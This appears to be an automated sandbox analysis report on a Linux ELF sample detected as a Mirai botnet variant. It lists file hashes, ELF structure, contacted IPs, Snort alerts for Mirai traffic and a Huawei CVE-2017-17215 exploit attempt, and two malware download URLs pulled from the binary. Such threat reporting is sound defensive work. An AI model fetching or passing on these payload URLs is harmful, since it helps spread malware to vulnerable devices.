Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/800/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/801/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1629/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1627/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1900/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/4470/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/3021/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/491/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/2294/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/2050/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1877/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/772/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1633/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1599/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1632/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/774/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1477/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/654/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/896/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1476/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1872/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/2048/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/655/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1475/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/2289/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/777/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/656/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/657/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/658/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/4467/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/4468/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/4469/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/419/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/936/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1639/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1638/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/2208/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/2180/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/6148/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1809/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1494/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1890/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/2063/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/2062/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1888/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1886/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/420/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1489/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/785/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1642/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/788/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/667/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/789/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/1648/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/4491/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/4493/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/6156/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/4497/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/2078/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/2077/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/2074/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/2195/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/670/exe
Source: /tmp/qFhgp7xLT7 (PID: 6245)	File opened: /proc/2746/exe

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60482
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60548
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60552
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60624
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60650
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60664
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60670
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60672
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60678
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 60684
Source: unknown	Network traffic detected: HTTP traffic on port 57624 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39528 -> 37215

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match

File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Mirai

Source: Yara match

File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	Direct Volume Access	1 OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Service Stop
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	4 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	5 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	4 Ingress Tool Transfer	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
qFhgp7xLT7	57%	Virustotal		Browse
qFhgp7xLT7	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://45.95.55.16/bins/x86	100%	Avira URL Cloud	malware
http://45.95.55.16/8UsA.sh;	100%	Avira URL Cloud	malware
http://102.129.143.42:45766/	0%	Avira URL Cloud	safe
http://192.168.0.14:80/cgi-bin/ViewLog.asp	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://102.129.143.42:45766/	false	Avira URL Cloud: safe	unknown
http://192.168.0.14:80/cgi-bin/ViewLog.asp	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://45.95.55.16/bins/x86	qFhgp7xLT7	true	Avira URL Cloud: malware	unknown
http://45.95.55.16/8UsA.sh;	qFhgp7xLT7	true	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/soap/encoding/	qFhgp7xLT7	false		high
http://schemas.xmlsoap.org/soap/envelope/	qFhgp7xLT7	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
31.253.206.97	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
95.145.60.28	unknown	United Kingdom	12576	EELtdGB	false
94.159.123.250	unknown	Russian Federation	49531	NETCOM-R-ASRU	false
201.30.209.120	unknown	Brazil	4230	CLAROSABR	false
88.146.190.11	unknown	Czech Republic	6830	LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding	false
31.220.220.235	unknown	United Kingdom	42689	GLIDEGB	false
94.99.181.106	unknown	Saudi Arabia	25019	SAUDINETSTC-ASSA	false
95.195.139.134	unknown	Sweden	3301	TELIANET-SWEDENTeliaCompanySE	false
85.84.200.25	unknown	Spain	12338	EUSKALTELES	false
94.94.61.52	unknown	Italy	3269	ASN-IBSNAZIT	false
95.109.203.228	unknown	Ukraine	34610	RIKSNETSE	false
94.42.250.14	unknown	Poland	5588	GTSCEGTSCentralEuropeAntelGermanyCZ	false
94.55.185.148	unknown	Turkey	47524	TURKSAT-ASTR	false
169.26.51.250	unknown	United States	37611	AfrihostZA	false
62.141.160.9	unknown	Germany	20588	FVBDE	false
95.235.98.9	unknown	Italy	3269	ASN-IBSNAZIT	false
62.60.239.87	unknown	Iran (ISLAMIC Republic Of)	18013	ASLINE-AS-APASLINELIMITEDHK	false
85.4.81.27	unknown	Switzerland	3303	SWISSCOMSwisscomSwitzerlandLtdCH	false
62.35.119.106	unknown	France	5410	BOUYGTEL-ISPFR	false
95.115.114.37	unknown	Germany	6805	TDDE-ASN1DE	false
157.29.93.233	unknown	Italy	8968	BT-ITALIAIT	false
163.16.181.143	unknown	Taiwan; Republic of China (ROC)	1659	ERX-TANET-ASN1TaiwanAcademicNetworkTANetInformationC	false
31.191.242.164	unknown	Italy	24608	WINDTRE-ASIT	false
95.117.176.89	unknown	Germany	6805	TDDE-ASN1DE	false
41.203.88.15	unknown	Nigeria	37148	globacom-asNG	false
62.129.56.59	unknown	Czech Republic	30764	PODA-ASCZ	false
157.114.204.191	unknown	Japan	2907	SINET-ASResearchOrganizationofInformationandSystemsN	false
94.72.179.67	unknown	Bulgaria	42735	MAXTELECOM-ASBG	false
96.173.246.144	unknown	United States	7922	COMCAST-7922US	false
95.221.2.232	unknown	Russian Federation	12714	TI-ASMoscowRussiaRU	false
85.18.200.222	unknown	Italy	12874	FASTWEBIT	false
94.8.166.131	unknown	United Kingdom	5607	BSKYB-BROADBAND-ASGB	false
31.85.14.80	unknown	United Kingdom	12576	EELtdGB	false
94.137.178.59	unknown	Georgia	16010	MAGTICOMASCaucasus-OnlineGE	false
62.181.174.193	unknown	Poland	12741	AS-NETIAWarszawa02-822PL	false
85.248.194.82	unknown	Slovakia (SLOVAK Republic)	5578	AS-BENESTRABratislavaSlovakRepublicSK	false
157.113.23.17	unknown	Japan	9993	CTC-ODCITOCHUTechno-SolutionsCorporationJP	false
138.99.154.13	unknown	Brazil	264205	ENInformaticaProvedordeInternetLTDA-MEBR	false
62.181.174.195	unknown	Poland	12741	AS-NETIAWarszawa02-822PL	false
17.137.34.147	unknown	United States	714	APPLE-ENGINEERINGUS	false
62.58.31.144	unknown	Belgium	13127	VERSATELASfortheTrans-EuropeanTele2IPTransportbackbo	false
94.226.96.232	unknown	Belgium	6848	TELENET-ASBE	false
85.23.76.207	unknown	Finland	16086	DNAFI	false
115.244.44.117	unknown	India	55836	RELIANCEJIO-INRelianceJioInfocommLimitedIN	false
93.13.252.32	unknown	France	15557	LDCOMNETFR	false
62.198.53.98	unknown	Denmark	3308	TELIANET-DENMARKDK	false
95.87.151.78	unknown	Slovenia	2107	ARNES-NETAcademicandResearchNetworkofSloveniaSI	false
112.207.198.197	unknown	Philippines	9299	IPG-AS-APPhilippineLongDistanceTelephoneCompanyPH	false
191.140.250.68	unknown	Brazil	26615	TIMSABR	false
31.210.249.105	unknown	Sweden	35706	NAOSE	false
62.130.69.46	unknown	United Kingdom	12337	NORIS-NETWORKITServiceProviderlocatedinNuernbergGerm	false
85.48.34.102	unknown	Spain	12479	UNI2-ASES	false
95.152.245.248	unknown	United Kingdom	8190	MDNXGB	false
85.203.114.30	unknown	France	30801	OZONE53avenuedelapierrevalleeFR	false
95.38.211.215	unknown	Iran (ISLAMIC Republic Of)	41881	FANAVA-ASFanavaGroupCommunicationCoIR	false
62.69.168.200	unknown	Finland	59766	ASWICITYIT	false
88.194.33.151	unknown	Finland	1759	TSF-IP-CORETeliaFinlandOyjEU	false
31.249.160.244	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
41.145.255.155	unknown	South Africa	5713	SAIX-NETZA	false
134.233.80.36	unknown	United States	531	DNIC-AS-00531US	false
85.145.61.252	unknown	Netherlands	50266	TMOBILE-THUISNL	false
62.154.36.54	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
85.251.82.24	unknown	Spain	12357	COMUNITELSPAINES	false
95.255.148.99	unknown	Italy	3269	ASN-IBSNAZIT	false
85.4.81.41	unknown	Switzerland	3303	SWISSCOMSwisscomSwitzerlandLtdCH	false
85.246.119.70	unknown	Portugal	3243	MEO-RESIDENCIALPT	false
112.168.206.75	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
34.96.170.37	unknown	United States	15169	GOOGLEUS	false
31.142.125.232	unknown	Turkey	16135	TURKCELL-ASTurkcellASTR	false
133.202.207.37	unknown	Japan	2518	BIGLOBEBIGLOBEIncJP	false
85.84.200.51	unknown	Spain	12338	EUSKALTELES	false
31.2.10.21	unknown	Poland	21243	PLUSNETPlusGSMtransitcorenetworkPL	false
31.138.187.95	unknown	Netherlands	15480	VFNL-ASVodafoneNLAutonomousSystemNL	false
95.17.57.3	unknown	Spain	12479	UNI2-ASES	false
120.204.61.130	unknown	China	24400	CMNET-V4SHANGHAI-AS-APShanghaiMobileCommunicationsCoLt	false
94.94.36.76	unknown	Italy	3269	ASN-IBSNAZIT	false
95.214.171.221	unknown	Germany	398083	TING-WIRELESSUS	false
197.132.199.82	unknown	Egypt	24835	RAYA-ASEG	false
94.193.8.111	unknown	United Kingdom	5607	BSKYB-BROADBAND-ASGB	false
182.142.116.186	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
85.86.237.89	unknown	Spain	12338	EUSKALTELES	false
112.229.41.35	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
64.250.214.67	unknown	United States	11650	PLDIUS	false
94.81.248.205	unknown	Italy	3269	ASN-IBSNAZIT	false
81.167.199.108	unknown	Norway	29695	ALTIBOX_ASNorwayNO	false
85.4.81.34	unknown	Switzerland	3303	SWISSCOMSwisscomSwitzerlandLtdCH	false
62.74.8.188	unknown	Greece	12361	PANAFONET-ASAthensGreeceGR	false
94.22.161.90	unknown	Finland	15527	ANVIASilmukkatie6VaasaFinlandFI	false
95.58.131.6	unknown	Kazakhstan	9198	KAZTELECOM-ASKZ	false
211.110.246.112	unknown	Korea Republic of	18302	SKG_NW-AS-KRSKTelecomKR	false
112.99.5.255	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
85.225.228.65	unknown	Sweden	2119	TELENOR-NEXTELTelenorNorgeASNO	false
31.230.126.182	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
95.25.159.120	unknown	Russian Federation	3216	SOVAM-ASRU	false
170.179.27.54	unknown	China	11685	HNBCOL-ASUS	false
107.12.162.47	unknown	United States	11426	TWC-11426-CAROLINASUS	false
31.234.6.33	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
117.29.208.192	unknown	China	133776	CHINATELECOM-FUJIAN-QUANZHOU-IDC1QuanzhouCN	false
94.85.243.94	unknown	Italy	3269	ASN-IBSNAZIT	false
85.47.176.191	unknown	Italy	3269	ASN-IBSNAZIT	false

File type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.429540192344578
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	qFhgp7xLT7
File size:	62224
MD5:	60c16bbdea70d058618c85e3e7d5a7c5
SHA1:	333cc469a02c21fdde6206127bc0656919f7d05c
SHA256:	3d8b14056393a46c2f3b2c2db245f3d3bef205eae544ab7a01cb47d56cbb8e8c
SHA512:	0f06345bb69568cea61c1957c58a86ebf2226fa1121030fc7b53f35faf47ad7bf8a025fcfc2a570349224fd88d741a2545f850621ab0ac4a43b8c3ca37ffcd2a
SSDEEP:	1536:VMzVhePhrkmetvEuckIzN/hkfgiu5BSSs84IlZ6fUoBiA+pTLEx:VMzVhePlkmetvBcxJhyu5BNAIlg9oAuf
TLSH:	AF5339C0A993DCF2DD1146B93177FF328636F436212AE9E7D7D9A923AC81E40910729D
File Content Preview:	.ELF....................d...4...........4. ...(..............................................p...p..@...............Q.td............................U..S.......w....h........[]...$.............U......=@q...t..5....$p.....$p......u........t....h.o..........

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Intel 80386
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x8048164
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	61824
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x8048094	0x94	0x1c	0x0	0x6	AX	1
.text	PROGBITS	0x80480b0	0xb0	0xe116	0x0	0x6	AX	16
.fini	PROGBITS	0x80561c6	0xe1c6	0x17	0x0	0x6	AX	1
.rodata	PROGBITS	0x80561e0	0xe1e0	0xd20	0x0	0x2	A	32
.ctors	PROGBITS	0x8057000	0xf000	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x8057008	0xf008	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x8057020	0xf020	0x120	0x0	0x3	WA	32
.bss	NOBITS	0x8057140	0xf140	0x6a0	0x0	0x3	WA	32
.shstrtab	STRTAB	0x0	0xf140	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8048000	0x8048000	0xef00	0xef00	3.9502	0x5	R E	0x1000	.init .text .fini .rodata
LOAD	0xf000	0x8057000	0x8057000	0x140	0x7e0	2.5837	0x6	RW	0x1000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.23112.72.202.7037234802839471 05/27/22-12:33:25.144916	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	37234	80	192.168.2.23	112.72.202.70
192.168.2.2388.248.3.1233844802839471 05/27/22-12:32:09.515172	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33844	80	192.168.2.23	88.248.3.12
192.168.2.2388.221.67.12845550802839471 05/27/22-12:31:17.612604	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45550	80	192.168.2.23	88.221.67.128
192.168.2.2388.198.95.5834904802839471 05/27/22-12:33:19.894224	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34904	80	192.168.2.23	88.198.95.58
192.168.2.2395.216.157.13536388802839471 05/27/22-12:31:45.532082	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36388	80	192.168.2.23	95.216.157.135
192.168.2.2388.80.187.2054684802839471 05/27/22-12:31:48.571853	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54684	80	192.168.2.23	88.80.187.20
192.168.2.23112.186.20.3843052802839471 05/27/22-12:32:37.328412	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43052	80	192.168.2.23	112.186.20.38
192.168.2.2395.142.154.3538450802839471 05/27/22-12:33:45.996466	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38450	80	192.168.2.23	95.142.154.35
192.168.2.2388.119.176.7846082802839471 05/27/22-12:31:17.602521	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46082	80	192.168.2.23	88.119.176.78
192.168.2.2388.202.185.3443256802839471 05/27/22-12:31:48.544252	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43256	80	192.168.2.23	88.202.185.34
192.168.2.2395.213.144.23458586802839471 05/27/22-12:31:56.949860	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58586	80	192.168.2.23	95.213.144.234
192.168.2.23112.72.55.5240524802839471 05/27/22-12:33:51.607828	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40524	80	192.168.2.23	112.72.55.52
192.168.2.2388.221.182.10450788802839471 05/27/22-12:32:43.974254	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50788	80	192.168.2.23	88.221.182.104
192.168.2.2395.181.216.18845576802839471 05/27/22-12:31:45.532015	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45576	80	192.168.2.23	95.181.216.188
192.168.2.2395.216.46.5638706802839471 05/27/22-12:30:59.349797	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38706	80	192.168.2.23	95.216.46.56
192.168.2.23112.197.186.6934248802839471 05/27/22-12:34:15.486204	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34248	80	192.168.2.23	112.197.186.69
192.168.2.2395.85.49.12557494802839471 05/27/22-12:31:01.042653	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57494	80	192.168.2.23	95.85.49.125
192.168.2.2395.101.51.17833806802839471 05/27/22-12:34:11.712649	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33806	80	192.168.2.23	95.101.51.178
192.168.2.2388.248.97.4251404802839471 05/27/22-12:31:19.756383	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51404	80	192.168.2.23	88.248.97.42
192.168.2.23112.211.86.22251576802839471 05/27/22-12:31:28.539011	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51576	80	192.168.2.23	112.211.86.222
192.168.2.23197.234.59.4957624372152835222 05/27/22-12:33:52.815817	TCP	2835222	ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)	57624	37215	192.168.2.23	197.234.59.49
192.168.2.2395.217.223.8845340802839471 05/27/22-12:31:01.059678	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45340	80	192.168.2.23	95.217.223.88
192.168.2.2395.80.109.20545624802839471 05/27/22-12:33:44.241244	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45624	80	192.168.2.23	95.80.109.205
192.168.2.2395.183.11.6060636802839471 05/27/22-12:31:33.291681	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60636	80	192.168.2.23	95.183.11.60
192.168.2.2388.153.193.10557226802839471 05/27/22-12:33:32.506696	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57226	80	192.168.2.23	88.153.193.105
192.168.2.23112.186.70.8049836802839471 05/27/22-12:31:46.023807	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49836	80	192.168.2.23	112.186.70.80
192.168.2.2395.110.179.22947442802839471 05/27/22-12:32:12.681029	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47442	80	192.168.2.23	95.110.179.229
192.168.2.23112.166.221.9432838802839471 05/27/22-12:32:39.180234	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	32838	80	192.168.2.23	112.166.221.94
192.168.2.2388.212.1.16633040802839471 05/27/22-12:32:16.185110	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33040	80	192.168.2.23	88.212.1.166
192.168.2.2395.14.86.19846290802839471 05/27/22-12:31:33.281866	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46290	80	192.168.2.23	95.14.86.198
192.168.2.23112.167.174.10546562802839471 05/27/22-12:31:50.944811	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46562	80	192.168.2.23	112.167.174.105
192.168.2.23112.186.20.3843220802839471 05/27/22-12:32:47.374861	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43220	80	192.168.2.23	112.186.20.38
192.168.2.2388.119.146.2644976802839471 05/27/22-12:33:27.528059	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44976	80	192.168.2.23	88.119.146.26
192.168.2.2388.225.227.24433820802839471 05/27/22-12:31:06.463207	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33820	80	192.168.2.23	88.225.227.244
192.168.2.23112.81.130.6753396802839471 05/27/22-12:31:51.424495	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53396	80	192.168.2.23	112.81.130.67
192.168.2.2395.56.61.339992802839471 05/27/22-12:31:33.483422	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39992	80	192.168.2.23	95.56.61.3
192.168.2.23112.175.41.18034328802839471 05/27/22-12:32:13.340256	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34328	80	192.168.2.23	112.175.41.180
192.168.2.23112.74.93.13439556802839471 05/27/22-12:32:02.442088	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39556	80	192.168.2.23	112.74.93.134
192.168.2.2388.221.40.18858726802839471 05/27/22-12:31:54.763991	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58726	80	192.168.2.23	88.221.40.188
192.168.2.2395.56.210.23144612802839471 05/27/22-12:31:00.444715	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44612	80	192.168.2.23	95.56.210.231
192.168.2.2395.211.24.21636048802839471 05/27/22-12:34:29.393344	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36048	80	192.168.2.23	95.211.24.216
192.168.2.2395.163.202.3455820802839471 05/27/22-12:31:35.237352	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55820	80	192.168.2.23	95.163.202.34
192.168.2.2388.218.28.7358892802839471 05/27/22-12:32:18.783163	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58892	80	192.168.2.23	88.218.28.73
192.168.2.2395.100.7.13456148802839471 05/27/22-12:33:06.960464	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56148	80	192.168.2.23	95.100.7.134
192.168.2.2395.174.197.18435646802839471 05/27/22-12:31:11.849947	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35646	80	192.168.2.23	95.174.197.184
192.168.2.23112.74.79.4439520802839471 05/27/22-12:31:50.936841	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39520	80	192.168.2.23	112.74.79.44
192.168.2.23112.149.226.20155834802839471 05/27/22-12:32:37.572523	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55834	80	192.168.2.23	112.149.226.201
192.168.2.23112.186.20.3843104802839471 05/27/22-12:32:41.687023	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43104	80	192.168.2.23	112.186.20.38
192.168.2.2395.168.210.3346156802839471 05/27/22-12:32:06.984091	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46156	80	192.168.2.23	95.168.210.33
192.168.2.2395.211.152.13753944802839471 05/27/22-12:32:18.728402	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53944	80	192.168.2.23	95.211.152.137
192.168.2.2395.142.205.21235762802839471 05/27/22-12:31:34.926249	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35762	80	192.168.2.23	95.142.205.212
192.168.2.2395.238.152.22358532802839471 05/27/22-12:32:22.621176	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58532	80	192.168.2.23	95.238.152.223
